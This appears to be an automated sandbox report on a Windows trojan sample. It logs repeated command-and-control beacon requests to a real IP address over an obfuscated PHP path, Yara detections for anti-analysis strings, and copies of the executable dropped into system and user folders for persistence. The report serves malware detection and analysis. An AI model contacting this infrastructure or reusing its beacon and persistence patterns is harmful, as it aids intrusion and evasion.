Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164
Source: unknown	TCP traffic detected without corresponding DNS query: 82.146.61.164

Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&Qwo2irmnoV=YhU7MQKNp5jw68qGmj2EO9Q&XsrVJW5pTKYX7gxvZm1Wq9s31l9E=QdZRbjejzETA4cwkSJGvHolI3 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&ZVSxTWRKIX4WAKi9eeqlLhfkTFe6=YMPLZX6E9wpNIWg HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&LysFYqMsinte=I6ADlK1LX&ca5T=9SGrVSUxhWH4wgrENNx0VJZ7p&JxuQodWZtQgCI6xIcrdPEoq9ONHdbz3=CXIhDQ HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6 HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 82.146.61.164
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&lAhnJNadMavr7iaE=ZXVZQ&3Y9JuvB=DFJyj5HlpMCmNsD&Q7JLvKfEUznPKEqsL7rmyu=I9xsJXo7KUS2wlzq2jFduS1bkfT HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 82.146.61.164

Source: QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2043423134.0000000002D02000.00000004.00000800.00020000.00000000.sdmp, QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2043423134.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CE8000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.146.61.164
Source: ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.146.61.164/localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Long
Source: B9exXW7c3t.exe, 00000000.00000002.2023417505.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2043423134.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2080688928.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.2.ApplicationFrameHost.exe.2b6eca8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
Source: 26.2.QeWHGGzCXwoQygZUiDI.exe.2b7eff0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
Source: 0.2.B9exXW7c3t.exe.2ee9680.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File created: C:\Windows\SchCache\2e26acd4fd0504	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F22220	32_2_00007FF848F22220
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F1A83D	32_2_00007FF848F1A83D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F1ACDD	32_2_00007FF848F1ACDD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F19BCD	32_2_00007FF848F19BCD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F19BCD	32_2_00007FF848F19BCD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F19BCD	32_2_00007FF848F19BCD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Code function: 32_2_00007FF848F1ACAD	32_2_00007FF848F1ACAD

Source: B9exXW7c3t.exe, 00000000.00000002.2023417505.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000000.1993850598.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibcrypto$ vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2041161758.000000001BF19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcrypto vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023194286.0000000002E00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023325521.0000000002E30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023417505.0000000002F57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023417505.0000000002F31000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023417505.0000000002F86000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023093722.0000000002DC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2025245210.000000001348D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023118743.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023281514.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe, 00000000.00000002.2023358574.0000000002E60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUserPingCounter.dclib4 vs B9exXW7c3t.exe
Source: B9exXW7c3t.exe	Binary or memory string: OriginalFilenamelibcrypto$ vs B9exXW7c3t.exe

Source: B9exXW7c3t.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 28.2.ApplicationFrameHost.exe.2b6eca8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
Source: 26.2.QeWHGGzCXwoQygZUiDI.exe.2b7eff0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
Source: 0.2.B9exXW7c3t.exe.2ee9680.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names

Source: B9exXW7c3t.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QeWHGGzCXwoQygZUiDI.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: winlogon.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QeWHGGzCXwoQygZUiDI.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: B9exXW7c3t.exe, HxiJNeDrMF3JhcnBaNt.cs	Cryptographic APIs: 'TransformBlock'
Source: B9exXW7c3t.exe, HxiJNeDrMF3JhcnBaNt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: B9exXW7c3t.exe, xWGOqHsklDSgxDT0Beu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: B9exXW7c3t.exe, xWGOqHsklDSgxDT0Beu.cs	Cryptographic APIs: 'CreateDecryptor'

Source: ctfmon.exe, 00000027.00000002.2292255279.0000000000F88000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: classification engine

Classification label: mal100.troj.evad.winEXE@39/30@0/1

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

File created: C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

File created: C:\Users\Default User\Saved Games\QeWHGGzCXwoQygZUiDI.exe

Jump to behavior

